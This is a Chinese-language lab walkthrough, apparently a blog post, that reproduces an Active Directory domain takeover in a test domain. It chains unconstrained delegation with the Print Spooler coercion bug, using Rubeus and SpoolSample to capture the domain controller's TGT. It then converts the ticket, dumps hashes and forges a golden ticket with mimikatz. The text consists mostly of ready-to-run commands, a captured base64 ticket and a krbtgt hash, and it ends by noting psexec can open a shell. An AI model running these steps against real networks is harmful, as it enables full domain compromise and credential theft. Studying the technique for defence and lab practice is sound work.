环境
域: test.com
域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7
域内主机:系统:windows 2008R2,主机名:WIN2008,ip:192.168.1.8
原理:利用非约束委派+Spooler打印机服务可以强制指定的主机进行连接
我们给win2008R2这个主机账户开启非约束委派
复现
1、首先我们需要一个win2008R2的管理账号
我直接用本地的管理员账号打开一个cmd
直接运行命令
Rubeus.exe monitor /interval:1 /filteruser:AD$
# 我们可以用Rubeus来监听Event ID为4624事件,这样可以第一时间截取到域控的TGT
# /interval:1 设置监听间隔1秒
# /filteruser 监听对象为我们的域控,注意后面有个$,如果不设置监听对象就监听所有的TGT
2、随便打开一个cmd(不需要管理员权限)
直接执行
SpoolSample_v4.5_x64.exe AD WIN2008
# 表示利用打印服务强制让域控机向WIN2008主机验证身份,这样我们的Rubeus就可以监听到TGS了
虽然报错了,但是Rubeus已经接收到了TGT
这儿顺便提一句,有时候cmd不能最大化
我们可以现在cmd运行wmic,然后再扩大cmd,再exit退出即可
3、提取TGS
我们先复制Rubeus监听到的TGT的base64
doIEyDCCBMSgAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQobCFRFU1QuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhURVNULkNPTaOCA54wggOaoAMCARKhAwIBAqKCA4wEggOIizg+lVbsDAa52/eGBUXWJpRO41sYu+nax+InJiZwGIXDnAEu3GLvpPBTnlyUy5OFkwF0fxDtIJmz6d1ta5rcPla5UnFQtxqsLt2FAB8bI3oygtArPsLtVo2nk5cxzIWrpZiYbVv1af9GUvFTBUSYP8y/RgdhPXckAwbe8fJqBL+LwGnLzmA8E5x5AdBWQ58aYrr9UQgEoUxkSewA6Y76TmrBedZ5iTSUEKgeSfDH/kfrN9cxZEWKQVkZ9or69a/XYTUrekSXIZhFXqX1CjQmhUbXeUUptFzEnnpyYLFc0XLssxPMaKbsGvacTt1SZy7sLq5me6mB6JEP5nB68Is7o9luHTu0E3XAA2OGc3oZ3/lou32ddj3SFBYJkfgDjgM7du2/Ys3WyNKPPBRGBJExouhtVF2eM+E2ADbGBhMrN9QImq9cXHqKLW0qW0uQUcNlzzN10NEZq692ZFTomuPxWVLKeg+OuvJNsLS+D0kWYoCcTT7T48ZfEkZ6s9uBtb86ddEHzIasbLMuCGlYK/ISbF2C3Hxw5oEt6Bdj9rVdPTEr3XjMcmCemdiIGbd5jBqUabkd7UXkIq2J4mVuuApt0yy62Lb9dRv6YyyO2l8qr3Pr440zCAZMYXdmwWWuQiU2w1u0YMS14v4kjQcAnRUVSnEt7yw8LALcsFW8cOXbPuXF8KhzMZ1HA54crgieI8+n4aqZy6uMCtgQJHg8oH8K1QJdlxeWLpmROH3bUWGpbLIPWaV7d+6LLxePYioRhkTmWmigbqyTuIY5EbZWfqMH6/rjPacbdsnvYB82cr9RJ0zd6Hqu0z1266ZX0b1EIBTGADOS3zAC23nuduDwnW+3nWa5nJHG/wBKuXfhmidXp4Ccs7eQsWNYdZuDMknAsSzHG7b8Tq+CP+hA8b7/sUk2Rfl8dPqxlqDAPOauvqGzcpJUlHl69xS+IWpVnzag1Th10tLj+FkUJBmEHSV9eELKf38mlD8phQm+wZ4D0LCNVZpHUBSWPWw/vX0V4RVdIFTeRAlioj52IYFXMY+L427EN/fjefXLIJIXwgz+n4DumNYXlMzMOpMbURF/ZktM4+za5EQAmyaBBXvCavhkxg4UYWFpsAX5vgqOGvhbFWXxeBMh5HznA8+ORI0MNY1alJmfqUxuibD/POlHySGgxL1AehNoL7+bsxJW/5zq0iNEyaeJMHFeMnOj66OB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oCswKaADAgESoSIEIC9SDAhlYy3MFcTbkg/BdIKYbsoGO6JvgRk5ZDUFgHqcoQobCFRFU1QuQ09NohAwDqADAgEBoQcwBRsDQUQkowcDBQBgoQAApREYDzIwMjAwNjAyMTQwMzAyWqYRGA8yMDIwMDYwMzAwMDMwMlqnERgPMjAyMDA2MDkwNDMyMjJaqAobCFRFU1QuQ09NqR0wG6ADAgECoRQwEhsGa3JidGd0GwhURVNULkNPTQ==
然后直接用powershell转到为正常的TGT即可
[IO.File]::WriteAllBytes("绝对路径\TGS\ticket.kirbi", [Convert]::FromBase64String("得到的base64"))
有一个比较坑的,那就是第一个参数用绝对路径,相对路径不是pwd命令的路径~~
这样我们就可以得到TGT票据了
4、制作黄金票据
注入TGT票据前
不能提取所有用户的hash
注入TGS票据后
然后就是制作黄金票据了
具体过程请参考另一篇文章
这儿请注意,我们这儿获得的TGT票据,不能算黄金票据,因为我们获得的权限只是域控的本地管理权限,所以不能连接域控,但是我们确可以因此获取所以用户的hash,所以能制作真正的黄金票据~~
首先获得域的SID
whoami /user
# S-1-5-21-3298638106-3321833000-1571791979
# 得到上面的SID,注意不需要后面表示账号权限的几位数
然后就是制作票据
kerberos::golden /domain:test.com /sid:S-1-5-21-3298638106-3321833000-1571791979 /krbtgt:0199f7c89b9d5262c897e0d1bf858bfb /user:administrator /ticket:ntlm.kirbi
然后注入票据
首先清除以前的票据
在cmd中运行 klist purge
在mimikatz运行:
kerberos::purge
kerberos::ptt ntlm.kirbi
然后klist查看我们注入的票据
可以直接连接域控
我们还可以直接用psexec反弹shell,因为注入了黄金票据,所以不需要用户名和秘密
这就是所有步骤了,如果有什么不明白的欢迎留言~~
最后还有如何用ADfind查找非约束委派的计算机和用户还没写,以后有机会再写一下吧~~